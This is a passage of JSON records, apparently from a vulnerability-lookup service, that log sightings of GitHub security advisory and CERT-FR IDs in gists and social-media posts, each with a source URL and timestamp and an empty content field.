"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/f9cbed73c44a4a4c558c018596c67ed3", "content": "", "creation_timestamp": "2025-07-16T14:30:34.000000Z"}, {"uuid": "e9436d5a-c353-46cb-b4a1-ae816cb4e06f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/f9cbed73c44a4a4c558c018596c67ed3", "content": "", "creation_timestamp": "2025-07-16T14:30:34.000000Z"}, {"uuid": "3e080376-db33-47f3-b551-0303784aa919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w77p-8cfg-2x43", "type": "seen", "source": "https://gist.github.com/safer-bot/f9cbed73c44a4a4c558c018596c67ed3", "content": "", "creation_timestamp": "2025-07-16T14:30:34.000000Z"}, {"uuid": "6fb986ca-b939-4910-bfbe-deb4c522e332", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/8b90b57146ec5c67bab7a2c865fdd98a", "content": "", "creation_timestamp": "2025-07-16T14:39:43.000000Z"}, {"uuid": "74758330-6883-4b3a-b944-1947a45758ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "d2df20cf-c76d-4283-8efd-fca3f2dcf816", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "90292642-1c36-4171-b009-9f1d9ed96c1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/42c52b7475f1deb88e5e54007f9a06a5", "content": "", "creation_timestamp": "2025-07-16T09:05:51.000000Z"}, {"uuid": "ca21cfed-4221-4322-b95d-0dcea1d71961", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/3f7e775d80964689d39c8a90a593c77d", "content": "", "creation_timestamp": "2025-07-16T10:54:54.000000Z"}, {"uuid": "9cba891b-bed5-4d0e-a001-8800b348b041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/3f7e775d80964689d39c8a90a593c77d", "content": "", "creation_timestamp": "2025-07-16T10:54:54.000000Z"}, {"uuid": "e540e1cf-27ab-4b80-9080-6e7211d7555d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/3f7e775d80964689d39c8a90a593c77d", "content": "", "creation_timestamp": "2025-07-16T10:54:54.000000Z"}, {"uuid": "9c68a241-29bc-44c7-aa64-01534828916b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "55a466b7-234a-426a-a8d0-6c17f48136d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "d4e2e70c-7df4-461f-804d-1c468eaaf22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37cp-fgq5-7wc2", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114620492551525583", "content": "", "creation_timestamp": "2025-06-03T16:58:39.467133Z"}, {"uuid": "104dd961-17e3-4c29-b6e4-56f6e3db3678", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "e57926e9-137d-4de7-8b02-285414bd2c87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/f5f3094bc77dfd093071700d86d96ae1", "content": "", "creation_timestamp": "2025-07-16T04:34:22.000000Z"}, {"uuid": "a40a233f-48b6-4f6c-bae4-e8e9524758ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/6c638c59f38f1493d83ef705137d7bd7", "content": "", "creation_timestamp": "2025-07-16T10:55:59.000000Z"}, {"uuid": "4bc8503a-8d0e-425d-9117-4d1ebebcc503", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/6c638c59f38f1493d83ef705137d7bd7", "content": "", "creation_timestamp": "2025-07-16T10:55:59.000000Z"}, {"uuid": "c610632d-52c4-43c1-93dd-f62904bfe80f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7w47-3wg8-547c", "type": "seen", "source": "https://gist.github.com/EliahKagan/4a29be12d6bea6d742d64e1724211fe5", "content": "", "creation_timestamp": "2025-05-10T12:40:53.000000Z"}, {"uuid": "9bab66a9-fcc1-469a-89cd-cb52672812f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "d9bdfbdf-04df-4666-b1b0-e1f0cfd079c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "ebfd0482-8cbe-4f2f-933f-c80a0a248341", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "431f5322-b311-4c3e-83c9-5c75a1adb811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-288c-cq4h-88gq", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "5762e47a-fca7-4435-a8da-efe103bde8fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h98-2769-gh6h", "type": "seen", "source": "https://gist.github.com/alissondpoliveira/29983764a9e449b0edeef6a4e813c0da", "content": "", "creation_timestamp": "2025-06-21T18:25:59.000000Z"}, {"uuid": "c75f4540-3f9f-47ee-9007-aea14c4d8f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fhq6-jf5q-qxvq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114779298982762165", "content": "", "creation_timestamp": "2025-07-01T18:05:12.757586Z"}, {"uuid": "f5c289a9-c52c-47e5-9c64-d996320d4ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "042be870-2cd6-45e9-abce-de76b41681d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "595d0f66-8de3-40e1-882d-feefdd5a92cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "19d28847-8eb0-46c6-9304-59cd0d83fbbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73GX-X7R9-77X2", "type": "seen", "source": "https://t.me/brutsecurity/1597", "content": "", "creation_timestamp": "2026-07-10T00:00:32.812892Z"}, {"uuid": "1c813bef-c8f5-4021-b1be-46cb8d09d3c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "43cd3651-f8a8-4558-b13e-f7ab5fdb4123", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "d3763bc4-cd91-451a-93cc-95246282cc90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/65364abe7e289d78f57fa1a0a681a35a", "content": "", "creation_timestamp": "2025-07-16T04:34:54.000000Z"}, {"uuid": "a3ecd06b-d38e-427b-a187-7a07f364fae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/6c638c59f38f1493d83ef705137d7bd7", "content": "", "creation_timestamp": "2025-07-16T10:55:59.000000Z"}, {"uuid": "eac86aa8-d896-48ad-b908-715ffd8de285", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/6c638c59f38f1493d83ef705137d7bd7", "content": "", "creation_timestamp": "2025-07-16T10:55:59.000000Z"}, {"uuid": "05579c1c-a854-4d27-9181-14bba16f0206", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "59a8eabe-2733-4bd6-830f-e6b89c57441b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/e2cb94a520ba9d822e3ae16ca29c6a51", "content": "", "creation_timestamp": "2025-07-16T12:54:33.000000Z"}, {"uuid": "6a7216f0-82bf-4529-b86f-df3d3369ed32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/4409ae4cd8ec93a7e40a4b22b8321b5b", "content": "", "creation_timestamp": "2025-07-16T13:40:40.000000Z"}, {"uuid": "9ef5bd31-1815-4596-b9bd-68e75539406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/4409ae4cd8ec93a7e40a4b22b8321b5b", "content": "", "creation_timestamp": "2025-07-16T13:40:40.000000Z"}, {"uuid": "fe661b16-1579-40e6-9731-c70c4ebc51d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/4409ae4cd8ec93a7e40a4b22b8321b5b", "content": "", "creation_timestamp": "2025-07-16T13:40:40.000000Z"}, {"uuid": "7653b647-04e6-4c1d-a6db-affe4d370741", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33p9-3p43-82vq", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114620542750640650", "content": "", "creation_timestamp": "2025-06-03T17:11:24.596474Z"}, {"uuid": "17cc3724-9199-4bf0-93df-82443e128c8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/38346a9351f29a3a56bfae039422e868", "content": "", "creation_timestamp": "2025-07-16T04:37:01.000000Z"}, {"uuid": "0ee66657-68e4-4e41-994e-cd7dad15fa80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g73c-fw68-pwx3", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114621017068916473", "content": "", "creation_timestamp": "2025-06-03T19:12:02.708256Z"}, {"uuid": "3606cb74-b9dc-4f90-a8fa-177df2b9b2fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3mc7-4q67-w48m", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "b07468de-a096-4615-a7f8-1831695acfba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w37g-rhq8-7m4j", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "9f0ac0e7-c01f-4954-829b-0f99486dc226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98wm-3w3q-mw94", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "6ec8e5f1-b75a-4606-9dec-e29b816bf827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w3m-gqgf-c4p9", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "abce3762-59a0-4f90-8fe2-1fa2a1baef66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "9c2b7475-2e36-45c8-9eb3-6bbd98f01f74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "efc7b7a7-6bbf-426c-ad09-2a73c352987d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgwf-w82q-5jrr", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "e3be87d5-acdd-4556-870f-ef66934c918c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/a0b20e4a34869c7132cfaf7355961494", "content": "", "creation_timestamp": "2025-07-16T11:16:51.000000Z"}, {"uuid": "d897074c-704f-4c13-be80-a18db0b38256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/a0b20e4a34869c7132cfaf7355961494", "content": "", "creation_timestamp": "2025-07-16T11:16:51.000000Z"}, {"uuid": "414b1795-5292-4ac0-b2aa-8bbacbdd1f42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/beca2d59db48a78497bed77a53b69c44", "content": "", "creation_timestamp": "2025-07-16T13:44:41.000000Z"}, {"uuid": "b53ee224-37fe-4a5d-9fbf-68961d4c66e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c4r9-r8fh-9vj2", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "eaa5c5f0-8281-488a-8f48-b187e6dc1e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhhw-99gj-p3c3", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "08fedb52-af61-490d-8e71-fbd534147799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8mx3-gp3p-vgg7", "type": "seen", "source": "https://gist.github.com/safer-bot/3dcff2aa616dcde9ac2ac8aefaa3438b", "content": "", "creation_timestamp": "2025-07-16T05:00:07.000000Z"}, {"uuid": "13a6343f-75d3-4069-9d13-40e691885769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/f88791fb8dd5727ee64f5ce6af65b97b", "content": "", "creation_timestamp": "2025-07-16T09:31:10.000000Z"}, {"uuid": "43761200-7433-4636-902f-0346fe257448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/7e41cd98739b152a5cbc9436836d99e7", "content": "", "creation_timestamp": "2025-07-16T05:11:32.000000Z"}, {"uuid": "fd37d7b9-e845-4b8a-a6f3-248c743a76f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/fd8139e9308cf0388a34823a4e1cc3f4", "content": "", "creation_timestamp": "2025-07-16T05:11:00.000000Z"}, {"uuid": "c10927d2-9d4b-49a5-8eb7-5392b3e7a0eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-007", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lp4vev6fp52t", "content": "", "creation_timestamp": "2025-05-14T11:27:31.938888Z"}, {"uuid": "a29be0ca-6ba1-4a02-a9f1-5ca44fef2f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-007", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lp4vmht6yb2f", "content": "", "creation_timestamp": "2025-05-14T11:31:46.425668Z"}, {"uuid": "d764a192-cbd2-4888-9346-9cf2c26361d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-007", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114505960988445982", "content": "", "creation_timestamp": "2025-05-14T11:31:47.512432Z"}, {"uuid": "c5185622-f088-4b80-8e50-8bdd91bdf7da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cph2-466c-3f87", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114506885070033703", "content": "", "creation_timestamp": "2025-05-14T15:26:47.299064Z"}, {"uuid": "65ab02e9-db2c-4917-b89c-c619a794542f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6p48-74j9-977j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114506885070033703", "content": "", "creation_timestamp": "2025-05-14T15:26:47.406288Z"}, {"uuid": "7990c251-6e17-44ba-833e-fff6b578c3f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c8hm-h9gv-8jpj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114506885070033703", "content": "", "creation_timestamp": "2025-05-14T15:26:47.500207Z"}, {"uuid": "0f1f1295-79ad-4804-8029-d6101b4149b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhv2-wfrr-4j2j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114506885070033703", "content": "", "creation_timestamp": "2025-05-14T15:26:47.589831Z"}, {"uuid": "6852cb13-6543-4027-95a5-aa150152e16a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9g7f-jmc3-rrmf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114506885070033703", "content": "", "creation_timestamp": "2025-05-14T15:26:47.711782Z"}, {"uuid": "be98f81a-7455-4353-be2b-4c0a4ae0bf39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mr8w-mmvv-6hq8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114507084261217407", "content": "", "creation_timestamp": "2025-05-14T16:17:25.560687Z"}, {"uuid": "a20e9609-7c5b-474c-862a-d31f5e6e7127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5mq-prx7-c588", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114507092132283688", "content": "", "creation_timestamp": "2025-05-14T16:19:25.536793Z"}, {"uuid": "b98fc83a-ef6e-4427-84cc-d5534e503691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/36492211dab3a46271629e4a8a76405d", "content": "", "creation_timestamp": "2025-07-16T22:00:52.000000Z"}, {"uuid": "91fe9b3e-5db8-41d9-9d76-f205539d0496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8qw-mgjx-rwjr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114693179021016123", "content": "", "creation_timestamp": "2025-06-16T13:03:46.692621Z"}, {"uuid": "fbf425f0-2ad1-48c7-b446-0f76e6fdcd9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-028", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3ltf2y3qpna2t", "content": "", "creation_timestamp": "2025-07-07T15:09:49.381316Z"}, {"uuid": "9b325f00-80f9-4cd7-97ff-bb05295a215f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7e41cd98739b152a5cbc9436836d99e7", "content": "", 